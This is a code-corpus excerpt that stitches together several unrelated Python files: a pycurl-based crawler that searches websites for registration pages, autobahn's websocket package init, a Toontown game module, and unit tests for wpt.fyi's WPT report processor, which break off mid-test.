self.logger.info('\tSkipping: Not an HTML page <<< %s', self._url)
return False
def Run(self):
"""Called only once for the initial url when we do not have more urls.
Downloads the originally-specified site url, parses it and gets the links.
Returns:
True, if a registration page is found, and False otherwise.
"""
if self.Download():
if not self._domain:
url_parsed = urlparse.urlparse(self._url)
self._domain = url_parsed[1]
if self._domain.startswith('www'):
self._domain = '.'.join(self._domain.split('.')[1:])
if self.ParseAndGetLinks():
return True
return False
class Crawler(object):
"""Crawls a site until a registration page is found or max level is reached.
Creates, uses and destroys Retriever objects. Creates a cookie temp file
needed for session cookies. It keeps track of 'visited links' and
'links to visit' of the site. To do this it uses the links discovered from
each Retriever object. Use Run() to crawl the site.
"""
try:
signal.signal(signal.SIGPIPE, signal.SIG_IGN)
except ImportError:
pass
logger = logging.getLogger(__name__)
def __init__(self, url, logging_level=None):
"""Init crawler URL, links lists, logger, and creates a cookie temp file.
The cookie temp file is needed for session cookies.
Args:
url: the initial "seed" url of the site.
logging_level: the desired verbosity level, default is None.
"""
if logging_level:
self.logger.setLevel(logging_level)
self.url_error = False
url_parsed = urlparse.urlparse(url)
if not url_parsed[0].startswith('http'):
self.logger.error(
'Error: "%s" does not begin with http:// or https://', url)
self.url_error = True
return
# Example: if url is 'http://www.example.com?name=john' then value [1] or
# network location is 'www.example.com'.
if not url_parsed[1]:
self.logger.error('Error: "%s" is not a valid url', url)
self.url_error = True
return
self._url = url
self._domain = ''
# Http links that contain a clue from LINK_CLUES.
self._clues_general_links = []
# Http links that do not contain any clue from LINK_CLUES.
self._general_links = []
# Https links that contain a clue from LINK_CLUES.
self._clues_secure_links = []
# Https links that do not contain any clue from LINK_CLUES.
self._secure_links = []
# All links downloaded and parsed so far.
self._links_visited = []
self._retrievers_list = []
self._cookie_file = tempfile.NamedTemporaryFile(
suffix='.cookie', delete=False)
self._cookie_file.close()
self._cookie_file = self._cookie_file.name # Keep only the filename.
def __del__(self):
"""Deletes cookie file when Crawler instances are destroyed."""
if hasattr(self, '_cookie_file'):
self.logger.info('Deleting cookie file %s ...', self._cookie_file)
os.unlink(self._cookie_file)
def _MultiPerform(self, curl_multi_object):
"""Performs concurrent downloads using a CurlMulti object.
Args:
curl_multi_object: a curl object that downloads multiple pages
concurrently. The class of this object is |pycurl.CurlMulti|.
"""
# Following code uses the example from section for the CurlMulti object
# at http://pycurl.sourceforge.net/doc/curlmultiobject.html.
while True:
ret, no_handles = curl_multi_object.perform()
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
while no_handles:
curl_multi_object.select(1.0)
while True:
ret, no_handles = curl_multi_object.perform()
if ret != pycurl.E_CALL_MULTI_PERFORM:
break
def _GetLinksPages(self, curl_multi_object):
"""Downloads many pages concurrently using a CurlMulti Object.
Creates many Retriever objects and adds them to a list. The constant
MAX_SAME_DOMAIN_URLS_NO defines the number of pages that can be downloaded
concurrently from the same domain using the pycurl multi object. It's
currently set to 30 URLs. These URLs are taken from the links lists, which
are from csl, gcl, sl, and gl. The rules define how many URLs are taken from
each list during each iteration.
Example of the rules:
3/10 from csl results in 9 URLs
3/10 from cgl results in 9 URLs
2/10 from sl results in 6 URLs
2/10 from gl results in 6 URLs
Adding up the above URLs gives 30 URLs that can be downloaded concurrently.
If these lists have fewer items than the defined rules, such as if a site
does not contain any secure links, then csl and sl lists will be of 0 length
and only 15 pages would be downloaded concurrently from the same domain.
Since 30 URLs can be handled concurrently, the number of links taken from
other lists can be increased. This means that we can take 24 links from the
cgl list so that 24 from gfl + 6 from gl = 30 URLs. If the cgl list has less
than 24 links, e.g. there are only 21 links, then only 9 links may be taken
from gl so ) + 21 + 0 + 9 = 30.
Args:
curl_multi_object: Each Retriever object has a curl object which is
added to the CurlMulti Object.
"""
self._retrievers_list = []
csl_no = min(CLUE_SECURE_LINKS_NO, len(self._clues_secure_links))
cgl_no = min(CLUE_GENERAL_LINKS_NO, len(self._clues_general_links))
sl_no = min(SECURE_LINKS_NO, len(self._secure_links))
gl_no = min(GENERAL_LINKS_NO, len(self._general_links))
# If some links within the list have fewer items than needed, the missing
# links will be taken by the following priority: csl, cgl, sl, gl.
# c: clues, s: secure, g: general, l: list.
spare_links = MAX_SAME_DOMAIN_URLS_NO - (csl_no + sl_no + cgl_no + gl_no)
if spare_links > 0:
csl_no = min(csl_no + spare_links, len(self._clues_secure_links))
spare_links = MAX_SAME_DOMAIN_URLS_NO - (csl_no + sl_no + cgl_no + gl_no)
if spare_links > 0:
cgl_no = min(cgl_no + spare_links, len(self._clues_general_links))
spare_links = MAX_SAME_DOMAIN_URLS_NO - (csl_no + sl_no + cgl_no + gl_no)
if spare_links > 0:
sl_no = min(sl_no + spare_links, len(self._secure_links))
spare_links = MAX_SAME_DOMAIN_URLS_NO - (csl_no + sl_no + cgl_no + gl_no)
if spare_links > 0:
gl_no = min(gl_no + spare_links, len(self._general_links))
for no_of_links, links in [
(csl_no, self._clues_secure_links),
(sl_no, self._secure_links),
(cgl_no, self._clues_general_links),
(gl_no, self._general_links)]:
for i in xrange(no_of_links):
if not links:
break
url = links.pop(0)
self._links_visited.append(url)
r = Retriever(url, self._domain, self._cookie_file)
r.InitRequestHead()
curl_multi_object.add_handle(r._curl_object)
self._retrievers_list.append(r)
if self._retrievers_list:
try:
self._MultiPerform(curl_multi_object)
except pycurl.error as e:
self.logger.error('Error: %s, url: %s', e, self._url)
finally:
for r in self._retrievers_list:
curl_multi_object.remove_handle(r._curl_object)
# |_retrievers_list[:]| is a copy of |_retrievers_list| to avoid removing
# items from the iterated list.
for r in self._retrievers_list[:]:
r._url = urlparse.urljoin(r._url, r._curl_object.getinfo(
pycurl.EFFECTIVE_URL))
content_type = r._curl_object.getinfo(pycurl.CONTENT_TYPE)
if content_type and ('text/html' in content_type.lower()):
r.InitRequestGet()
curl_multi_object.add_handle(r._curl_object)
else:
self._retrievers_list.remove(r)
self.logger.info('\tSkipping: Not an HTML page <<< %s', r._url)
if self._retrievers_list:
try:
self._MultiPerform(curl_multi_object)
except pycurl.error as e:
self.logger.error('Error: %s, url: %s', e, self._url)
finally:
for r in self._retrievers_list:
curl_multi_object.remove_handle(r._curl_object)
self.logger.info('Downloaded: %s', r._url)
def _LogRegPageFound(self, retriever):
"""Display logging for registration page found.
Args:
retriever: The object that has retrieved the page.
"""
self.logger.info('\t##############################################')
self.logger.info('\t### %s ###', retriever._domain)
self.logger.info('\t##############################################')
self.logger.info('\t!!!!!!!!! registration page FOUND !!!!!!!!!!!')
self.logger.info('\t%s', retriever._url)
self.logger.info('\t##############################################')
def _GetNewLinks(self, retriever):
"""Appends new links discovered by each retriever to the appropriate lists.
Links are copied to the links list of the crawler object, which holds all
the links found from all retrievers that the crawler object created. The
Crawler object exists as far as a specific site is examined and the
Retriever object exists as far as a page of this site is examined.
Args:
retriever: a temporary object that downloads a specific page, parses the
content and gets the page's href link.
"""
for link in retriever._clues_secure_links:
if (not link in self._clues_secure_links and
not link in self._links_visited):
self._clues_secure_links.append(link)
for link in retriever._secure_links:
if (not link in self._secure_links and
not link in self._links_visited):
self._secure_links.append(link)
for link in retriever._clues_general_links:
if (not link in self._clues_general_links and
not link in self._links_visited):
self._clues_general_links.append(link)
for link in retriever._general_links:
if (not link in self._general_links and
not link in self._links_visited):
self._general_links.append(link)
def Run(self):
"""Runs the Crawler.
Creates a Retriever object and calls its run method to get the first links,
and then uses CurlMulti object and creates many Retriever objects to get
the subsequent pages.
The number of pages (=Retriever objs) created each time is restricted by
MAX_SAME_DOMAIN_URLS_NO. After this number of Retriever objects download
and parse their pages, we do the same again. The number of total pages
visited is kept in urls_visited.
If no registration page is found, the Crawler object will give up its try
after MAX_TOTAL_URLS_PER_DOMAIN is reached.
Returns:
True is returned if registration page is found, or False otherwise.
"""
reg_page_found = False
if self.url_error:
return False
r = Retriever(self._url, self._domain, self._cookie_file)
if r.Run():
self._LogRegPageFound(r)
reg_page_found = True
else:
self._url = r._url
self._domain = r._domain
self.logger.info('url to crawl: %s', self._url)
self.logger.info('domain: %s', self._domain)
self._links_visited.append(r._url)
self._GetNewLinks(r)
urls_visited = 1
while True:
if (not (self._clues_secure_links or self._secure_links or
self._clues_general_links or self._general_links) or
urls_visited >= MAX_TOTAL_URLS_PER_DOMAIN):
break # Registration page not found.
m = pycurl.CurlMulti()
self._GetLinksPages(m)
urls_visited += len(self._retrievers_list)
self.logger.info('\t<----- URLs visited for domain "%s": %d ----->',
self._domain, urls_visited)
for r in self._retrievers_list:
if r.ParseAndGetLinks():
self._LogRegPageFound(r)
reg_page_found = True
break
else:
self.logger.info('parsed: %s', r._url)
self._GetNewLinks(r)
m.close()
if reg_page_found:
break
while self._retrievers_list:
r = self._retrievers_list.pop()
return reg_page_found
class WorkerThread(threading.Thread):
"""Creates a new thread of execution."""
def __init__(self, url):
"""Creates _url and page_found attri to populate urls_with_no_reg_page file.
Used after thread's termination for the creation of a file with a list of
the urls for which a registration page wasn't found.
Args:
url: will be used as an argument to create a Crawler object later.
"""
threading.Thread.__init__(self)
self._url = url
self.page_found = False
def run(self):
"""Execution of thread creates a Crawler object and runs it.
Caution: this function name should not be changed to 'Run' or any other
names because it is overriding the 'run' method of the 'threading.Thread'
class. Otherwise it will never be called.
"""
self.page_found = Crawler(self._url).Run()
class ThreadedCrawler(object):
"""Calls the Run function of WorkerThread which creates & runs a Crawler obj.
The crawler object runs concurrently, examining one site each.
"""
logger = logging.getLogger(__name__)
def __init__(self, urls_file, logging_level=None):
"""Creates threaded Crawler objects.
Args:
urls_file: a text file containing a URL in each line.
logging_level: verbosity level, default is None.
Raises:
IOError: If cannot find URLs from the list.
"""
if logging_level:
self.logger.setLevel(logging_level)
self._urls_list = []
f = open(urls_file)
try:
for url in f.readlines():
url = url.strip()
if not urlparse.urlparse(url)[0].startswith('http'):
self.logger.info(
'%s: skipping this (does not begin with "http://")', url)
continue
self._urls_list.append(url)
except IOError as e:
self.logger.error('Error: %s', e)
raise
finally:
f.close()
if not self._urls_list:
error_msg = 'No URLs were found.'
self.logger.error('ERROR: %s', error_msg)
raise IOError(error_msg)
def Run(self):
"""Runs Crawler objects using python threads.
Number of concurrent threads is restricted to MAX_ALLOWED_THREADS.
Returns:
The number of registration pages found. -1 if no URLs are given.
Raises:
OSError: When creating the same directory that already exists.
"""
if self._urls_list:
allThreads = []
# originalNumThreads is the number of threads just before the
# ThreadedCrawler starts creating new threads. As a standalone script it
# will be 1.
originalNumThreads = threading.active_count()
for url in self._urls_list:
self.logger.info('URL fed to a crawler thread: %s', url)
t = WorkerThread(url)
t.start()
allThreads.append(t)
while threading.active_count() >= (
MAX_ALLOWED_THREADS + originalNumThreads):
time.sleep(.4)
while threading.active_count() > originalNumThreads:
time.sleep(.4)
self.logger.info('----------------')
self.logger.info('--- FINISHED ---')
self.logger.info('----------------')
urls_no = 0
urls_not_found_no = 0
not_file_name = os.path.join(
REGISTER_PAGE_DIR, NOT_FOUND_REG_PAGE_SITES_FILENAME)
not_file_dir = os.path.dirname(not_file_name)
try:
os.makedirs(not_file_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
fnot = open(not_file_name, 'wb')
try:
for t in sorted(allThreads, key=lambda t: t._url):
urls_no += 1
if not t.page_found:
urls_not_found_no += 1
fnot.write('%s' % t._url)
fnot.write(os.linesep)
except IOError as e:
self.logger.error('Error: %s', e)
finally:
fnot.close()
self.logger.info('Total number of URLs given: %d\n', urls_no)
self.logger.info(
'Registration pages found: %d\n', (urls_no - urls_not_found_no))
self.logger.info(
'URLs that did not return a registration page: %d\n',
urls_not_found_no)
return urls_no - urls_not_found_no
else:
self.logger.error('Error: no URLs were found.')
return -1
def main():
usage = 'usage: %prog [options] single_url_or_urls_filename'
parser = optparse.OptionParser(usage)
parser.add_option(
'-l', '--log_level', metavar='LOG_LEVEL', default='error',
help='LOG_LEVEL: debug, info, warning or error [default: %default]')
(options, args) = parser.parse_args()
options.log_level = options.log_level.upper()
if options.log_level not in ['DEBUG', 'INFO', 'WARNING', 'ERROR']:
print 'Wrong log_level argument.'
parser.print_help()
return 1
options.log_level = getattr(logging, options.log_level)
if len(args) != 1:
parser.error('Wrong number of arguments.')
logger = logging.getLogger(__name__)
if options.log_level:
console = logging.StreamHandler()
logger.addHandler(console)
logger.setLevel(options.log_level)
arg_is_a_file = os.path.isfile(args[0])
if arg_is_a_file:
CrawlerClass = ThreadedCrawler
else:
CrawlerClass = Crawler
t0 = datetime.datetime.now()
c = CrawlerClass(args[0], options.log_level)
c.Run()
if not arg_is_a_file and c.url_error:
logger.error(
'ERROR: "%s" is neither a valid filename nor a valid URL' % args[0])
t1 = datetime.datetime.now()
delta_t = t1 - t0
logger.info('Started at: %s\n', t0)
logger.info('Ended at: %s\n', t1)
logger.info('Total execution time: %s\n', delta_t)
return 0
if __name__ == "__main__":
sys.exit(main())
| 37.607282
| 80
| 0.670263
|
d8cc4e8e3c8c96c413b7bd0c45ca524ca2e554fd
| 1,751
|
py
|
Python
|
env/Lib/site-packages/autobahn/websocket/__init__.py
|
AnilCharles96/django_chat_app
|
4b90fa90a703fe002e7e305e85c7621db7275d6f
|
[
"MIT"
] | 11
|
2016-09-14T21:58:37.000Z
|
2019-01-28T21:56:14.000Z
|
env/Lib/site-packages/autobahn/websocket/__init__.py
|
AnilCharles96/django_chat_app
|
4b90fa90a703fe002e7e305e85c7621db7275d6f
|
[
"MIT"
] | 14
|
2015-04-25T17:54:13.000Z
|
2017-01-13T15:30:39.000Z
|
env/Lib/site-packages/autobahn/websocket/__init__.py
|
AnilCharles96/django_chat_app
|
4b90fa90a703fe002e7e305e85c7621db7275d6f
|
[
"MIT"
] | 3
|
2019-09-18T01:34:23.000Z
|
2021-08-21T23:31:37.000Z
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Crossbar.io Technologies GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
from autobahn.websocket.types import ConnectionRequest, ConnectionResponse, \
ConnectionAccept, ConnectionDeny, Message, IncomingMessage, OutgoingMessage
from autobahn.websocket.interfaces import IWebSocketChannel
__all__ = (
'IWebSocketChannel',
'Message',
'IncomingMessage',
'OutgoingMessage',
'ConnectionRequest',
'ConnectionResponse',
'ConnectionAccept',
'ConnectionDeny',
)
| 39.795455
| 79
| 0.700742
|
3eb29f52710f32527b2f9d124727bcfc9fe600e6
| 1,037
|
py
|
Python
|
toontown/coghq/CashbotHQBossBattle.py
|
TheFamiliarScoot/open-toontown
|
678313033174ea7d08e5c2823bd7b473701ff547
|
[
"BSD-3-Clause"
] | 99
|
2019-11-02T22:25:00.000Z
|
2022-02-03T03:48:00.000Z
|
toontown/coghq/CashbotHQBossBattle.py
|
TheFamiliarScoot/open-toontown
|
678313033174ea7d08e5c2823bd7b473701ff547
|
[
"BSD-3-Clause"
] | 42
|
2019-11-03T05:31:08.000Z
|
2022-03-16T22:50:32.000Z
|
toontown/coghq/CashbotHQBossBattle.py
|
TheFamiliarScoot/open-toontown
|
678313033174ea7d08e5c2823bd7b473701ff547
|
[
"BSD-3-Clause"
] | 57
|
2019-11-03T07:47:37.000Z
|
2022-03-22T00:41:49.000Z
|
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from toontown.suit import DistributedCashbotBoss
from direct.directnotify import DirectNotifyGlobal
from toontown.coghq import CogHQBossBattle
class CashbotHQBossBattle(CogHQBossBattle.CogHQBossBattle):
notify = DirectNotifyGlobal.directNotify.newCategory('CashbotHQBossBattle')
def __init__(self, loader, parentFSM, doneEvent):
CogHQBossBattle.CogHQBossBattle.__init__(self, loader, parentFSM, doneEvent)
self.teleportInPosHpr = (88, -214, 0, 210, 0, 0)
def load(self):
CogHQBossBattle.CogHQBossBattle.load(self)
def unload(self):
CogHQBossBattle.CogHQBossBattle.unload(self)
def enter(self, requestStatus):
CogHQBossBattle.CogHQBossBattle.enter(self, requestStatus, DistributedCashbotBoss.OneBossCog)
def exit(self):
CogHQBossBattle.CogHQBossBattle.exit(self)
def exitCrane(self):
CogHQBossBattle.CogHQBossBattle.exitCrane(self)
messenger.send('exitCrane')
| 35.758621
| 101
| 0.762777
|
7ee26906a38538ac31819b35b93ca4c08f3f5d59
| 23,602
|
py
|
Python
|
results-processor/wptreport_test.py
|
lucacasonato/wpt.fyi
|
abcd336266b6b9a23e0f57be04ca07506270af39
|
[
"BSD-3-Clause"
] | 122
|
2018-05-15T18:54:46.000Z
|
2022-03-31T19:45:35.000Z
|
results-processor/wptreport_test.py
|
lucacasonato/wpt.fyi
|
abcd336266b6b9a23e0f57be04ca07506270af39
|
[
"BSD-3-Clause"
] | 1,947
|
2018-04-10T16:58:57.000Z
|
2022-03-28T18:09:55.000Z
|
results-processor/wptreport_test.py
|
lucacasonato/wpt.fyi
|
abcd336266b6b9a23e0f57be04ca07506270af39
|
[
"BSD-3-Clause"
] | 63
|
2018-04-13T13:51:09.000Z
|
2022-03-15T10:09:23.000Z
|
# Copyright 2018 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import gzip
import io
import json
import os
import shutil
import tempfile
import unittest
from wptreport import (
ConflictingDataError,
InsufficientDataError,
InvalidJSONError,
MissingMetadataError,
WPTReport,
prepare_labels,
normalize_product
)
class WPTReportTest(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_write_json(self):
obj = {'results': [{'test': 'foo'}]}
tmp_path = os.path.join(self.tmp_dir, 'test.json')
with open(tmp_path, 'wb') as f:
WPTReport.write_json(f, obj)
with open(tmp_path, 'rt') as f:
round_trip = json.load(f)
self.assertDictEqual(obj, round_trip)
def test_write_gzip_json(self):
# This case also covers the Unicode testing of write_json().
obj = {'results': [{
'test': 'ABC~‾¥≈¤・・•∙·☼★星🌟星★☼·∙•・・¤≈¥‾~XYZ',
'message': None,
'status': 'PASS'
}]}
tmp_path = os.path.join(self.tmp_dir, 'foo', 'bar.json.gz')
WPTReport.write_gzip_json(tmp_path, obj)
with open(tmp_path, 'rb') as f:
with gzip.GzipFile(fileobj=f, mode='rb') as gf:
with io.TextIOWrapper(gf, encoding='utf-8') as tf:
round_trip = json.load(tf)
self.assertDictEqual(obj, round_trip)
def test_load_json(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
with open(tmp_path, 'wt') as f:
f.write('{"results": [{"test": "foo"}]}')
r = WPTReport()
with open(tmp_path, 'rb') as f:
r.load_json(f)
self.assertEqual(len(r.results), 1)
# This is the sha1sum of the string written above.
self.assertEqual(r.hashsum(),
'afa59408e1797c7091d7e89de5561612f7da440d')
def test_load_json_empty_report(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
with open(tmp_path, 'wt') as f:
f.write('{}')
r = WPTReport()
with open(tmp_path, 'rb') as f:
with self.assertRaises(InsufficientDataError):
r.load_json(f)
def test_load_json_invalid_json(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
with open(tmp_path, 'wt') as f:
f.write('{[')
r = WPTReport()
with open(tmp_path, 'rb') as f:
with self.assertRaises(InvalidJSONError):
r.load_json(f)
def test_load_json_multiple_chunks(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
r = WPTReport()
with open(tmp_path, 'wt') as f:
f.write('{"results": [{"test1": "foo"}]}\n')
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
f.write('{"results": [{"test2": "bar"}]}\n')
with open(tmp_path, 'rb') as f:
r.load_json(f)
self.assertEqual(len(r.results), 2)
# This is the sha1sum of the two strings above concatenated.
self.assertEqual(r.hashsum(),
'3aa5e332b892025bc6c301e6578ae0d54375351d')
def test_load_json_multiple_chunks_metadata(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
r = WPTReport()
# Load a report with no metadata first to test the handling of None.
with open(tmp_path, 'wt') as f:
f.write('{"results": [{"test": "foo"}]}\n')
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test1': 'foo'}],
'run_info': {'product': 'firefox', 'os': 'linux'},
'time_start': 100,
'time_end': 200,
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test2': 'bar'}],
'run_info': {'product': 'firefox', 'browser_version': '59.0'},
'time_start': 10,
'time_end': 500,
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
self.assertEqual(len(r.results), 3)
# run_info should be the union of all run_info.
self.assertDictEqual(r.run_info, {
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
})
# The smallest time_start should be kept.
self.assertEqual(r._report['time_start'], 10)
# The largest time_end should be kept.
self.assertEqual(r._report['time_end'], 500)
def test_load_json_multiple_chunks_conflicting_data(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
r = WPTReport()
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test1': 'foo'}],
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59',
},
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test2': 'bar'}],
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'chrome',
'browser_version': '70',
},
}, f)
with open(tmp_path, 'rb') as f:
reg = r"product: \[chrome, firefox\], browser_version: \[70, 59\]"
with self.assertRaisesRegex(ConflictingDataError, reg):
r.load_json(f)
# Fields without conflict should be preserved.
self.assertEqual(r.run_info['revision'],
'0bdaaf9c1622ca49eb140381af1ece6d8001c934')
# Conflicting fields should be set to None.
self.assertIsNone(r.run_info['product'])
self.assertIsNone(r.run_info['browser_version'])
def test_load_json_multiple_chunks_ignored_conflicting_data(self):
tmp_path = os.path.join(self.tmp_dir, 'test.json')
r = WPTReport()
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test1': 'foo'}],
'run_info': {
'browser_build_id': '1',
'browser_changeset': 'r1',
},
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
with open(tmp_path, 'wt') as f:
json.dump({
'results': [{'test2': 'bar'}],
'run_info': {
'browser_build_id': '2',
'browser_changeset': 'r2',
},
}, f)
with open(tmp_path, 'rb') as f:
r.load_json(f)
self.assertIsNone(r.run_info['browser_build_id'])
self.assertIsNone(r.run_info['browser_changeset'])
def test_load_gzip_json(self):
# This case also covers the Unicode testing of load_json().
obj = {
'results': [{
'test': 'ABC~‾¥≈¤・・•∙·☼★星🌟星★☼·∙•・・¤≈¥‾~XYZ',
'message': None,
'status': 'PASS'
}],
'run_info': {},
}
json_s = json.dumps(obj, ensure_ascii=False)
tmp_path = os.path.join(self.tmp_dir, 'test.json.gz')
with open(tmp_path, 'wb') as f:
gzip_file = gzip.GzipFile(fileobj=f, mode='wb')
gzip_file.write(json_s.encode('utf-8'))
gzip_file.close()
r = WPTReport()
with open(tmp_path, 'rb') as f:
r.load_gzip_json(f)
self.assertDictEqual(r._report, obj)
def test_summarize(self):
r = WPTReport()
r._report = {'results': [
{
'test': '/js/with-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'}
]
},
{
'test': '/js/isNaN.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'},
{'status': 'PASS', 'message': None, 'name': 'third'}
]
}
]}
self.assertEqual(r.summarize(), {
'/js/with-statement.html': [2, 3],
'/js/isNaN.html': [3, 4]
})
def test_summarize_zero_results(self):
r = WPTReport()
# Do not throw!
r.summarize()
def test_summarize_duplicate_results(self):
r = WPTReport()
r._report = {'results': [
{
'test': '/js/with-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'}
]
},
{
'test': '/js/with-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'},
{'status': 'FAIL', 'message': 'bad', 'name': 'third'},
{'status': 'FAIL', 'message': 'bad', 'name': 'fourth'}
]
}
]}
with self.assertRaises(ConflictingDataError):
r.summarize()
def test_summarize_whitespaces(self):
r = WPTReport()
r._report = {'results': [
{
'test': ' /ref/reftest.html',
'status': 'PASS',
'message': None,
'subtests': []
},
{
'test': '/ref/reftest-fail.html\n',
'status': 'FAIL',
'message': None,
'subtests': []
}
]}
self.assertEqual(r.summarize(), {
'/ref/reftest.html': [1, 1],
'/ref/reftest-fail.html': [0, 1]
})
def test_each_result(self):
expected_results = [
{
'test': '/js/with-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'}
]
},
{
'test': '/js/isNaN.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'},
{'status': 'PASS', 'message': None, 'name': 'third'}
]
},
{
'test': '/js/do-while-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'}
]
},
{
'test': '/js/symbol-unscopables.html',
'status': 'TIMEOUT',
'message': None,
'subtests': []
},
{
'test': '/js/void-statement.html',
'status': 'OK',
'message': None,
'subtests': [
{'status': 'PASS', 'message': None, 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'},
{'status': 'FAIL', 'message': 'bad', 'name': 'third'},
{'status': 'FAIL', 'message': 'bad', 'name': 'fourth'}
]
}
]
r = WPTReport()
r._report = {'results': expected_results}
self.assertListEqual(list(r.each_result()), expected_results)
def test_populate_upload_directory(self):
# This also tests write_summary() and write_result_directory().
revision = '0bdaaf9c1622ca49eb140381af1ece6d8001c934'
r = WPTReport()
r._report = {
'results': [
{
'test': '/foo/bar.html',
'status': 'PASS',
'message': None,
'subtests': []
},
# Whitespaces need to be trimmed from the test name.
{
'test': ' /foo/fail.html\n',
'status': 'FAIL',
'message': None,
'subtests': []
}
],
'run_info': {
'revision': revision,
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
}
}
r.hashsum = lambda: '0123456789'
r.populate_upload_directory(output_dir=self.tmp_dir)
self.assertTrue(os.path.isfile(os.path.join(
self.tmp_dir, revision,
'firefox-59.0-linux-0123456789-summary.json.gz'
)))
self.assertTrue(os.path.isfile(os.path.join(
self.tmp_dir, revision,
'firefox-59.0-linux-0123456789', 'foo', 'bar.html'
)))
self.assertTrue(os.path.isfile(os.path.join(
self.tmp_dir, revision,
'firefox-59.0-linux-0123456789', 'foo', 'fail.html'
)))
def test_update_metadata(self):
r = WPTReport()
r.update_metadata(
revision='0bdaaf9c1622ca49eb140381af1ece6d8001c934',
browser_name='firefox',
browser_version='59.0',
os_name='linux',
os_version='4.4'
)
self.assertDictEqual(r.run_info, {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux',
'os_version': '4.4'
})
def test_test_run_metadata(self):
r = WPTReport()
r._report = {
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux'
}
}
self.assertDictEqual(r.test_run_metadata, {
'browser_name': 'firefox',
'browser_version': '59.0',
'os_name': 'linux',
'revision': '0bdaaf9c16',
'full_revision_hash': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
})
def test_test_run_metadata_missing_required_fields(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'firefox',
'os': 'linux'
}
}
with self.assertRaises(MissingMetadataError):
r.test_run_metadata
def test_test_run_metadata_optional_fields(self):
r = WPTReport()
r._report = {
'run_info': {
'revision': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'product': 'firefox',
'browser_version': '59.0',
'os': 'windows',
'os_version': '10'
},
'time_start': 1529606394218,
'time_end': 1529611429000,
}
self.assertDictEqual(r.test_run_metadata, {
'browser_name': 'firefox',
'browser_version': '59.0',
'os_name': 'windows',
'os_version': '10',
'revision': '0bdaaf9c16',
'full_revision_hash': '0bdaaf9c1622ca49eb140381af1ece6d8001c934',
'time_start': '2018-06-21T18:39:54.218000+00:00',
'time_end': '2018-06-21T20:03:49+00:00',
})
def test_product_id(self):
r = WPTReport()
r._report = {
'run_info': {
'product': 'firefox',
'browser_version': '59.0',
'os': 'linux',
}
}
r.hashsum = lambda: 'afa59408e1797c7091d7e89de5561612f7da440d'
